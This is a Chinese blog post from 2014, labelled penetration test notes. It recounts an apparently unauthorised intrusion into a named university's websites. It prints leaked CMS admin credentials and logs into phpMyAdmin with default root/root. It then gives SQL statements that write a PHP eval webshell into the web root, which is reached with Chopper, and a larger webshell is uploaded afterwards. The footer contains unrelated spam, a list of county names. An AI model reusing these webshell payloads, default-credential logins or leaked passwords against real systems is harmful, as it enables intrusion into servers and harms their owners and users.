qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          滲透測試筆記

          今天朋友在入侵織夢的網站系統,通過最新的Exp獲得了織夢后臺的賬號和密碼
            賬號:admin
            密碼:abc123456
            但是,找來找去找不到后臺,就讓我提權試試。
            我看了下:http://pxc.ncist.edu.cn/dede/
            后臺被刪除了!怎么辦??
            google hack也沒找到后臺
            后來,我試了試這個網站:http://zsjy.ncist.edu.cn/phpmyadmin
            輸入默認MySql賬號與密碼:
            賬號:root
            密碼:root
            居然進去了:
            接下來就是phpmyadmin提權了:
            我的思路是:
            1.先爆出php服務器www的路徑
            2.然后通過將php一句話插入數據庫再導出到www路徑
            通過google hack爆到路徑:D\www\
            呵呵,接下來就執行sql語句:
          CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );
          INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');
          SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';
            這段sql意思是:
            1.在mysql數據庫中建一張表叫xss,在xss表中生成一個field(字段)叫xss1
            2.將php一句話木馬插入數據庫中的xss1字段處
            3.將數據庫中xss1字段的內容導出到d:\www\x.php文件中
            這下,通過chopper連接x.php小馬得到shell


           接下來,上傳一個php大馬spider.php
            通過FF連接spider.php:
            成功獲得webshell!!!

          posted on 2014-04-24 10:21 順其自然EVO 閱讀(512) 評論(0)  編輯  收藏 所屬分類: 測試學習專欄安全性測試

          <2014年4月>
          303112345
          6789101112
          13141516171819
          20212223242526
          27282930123
          45678910

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 普格县| 南川市| 北票市| 嘉义市| 吉木萨尔县| 高密市| 洛浦县| 巨鹿县| 宁武县| 涿鹿县| 雷州市| 南江县| 灌云县| 剑川县| 宣化县| 乐清市| 青河县| 买车| 阿拉善盟| 遵化市| 丰原市| 扶沟县| 十堰市| 衡山县| 盐津县| 永州市| 清涧县| 永安市| 石狮市| 德惠市| 全椒县| 屏南县| 西盟| 东源县| 鸡西市| 宁强县| 绥阳县| 个旧市| 文安县| 新兴县| 仲巴县|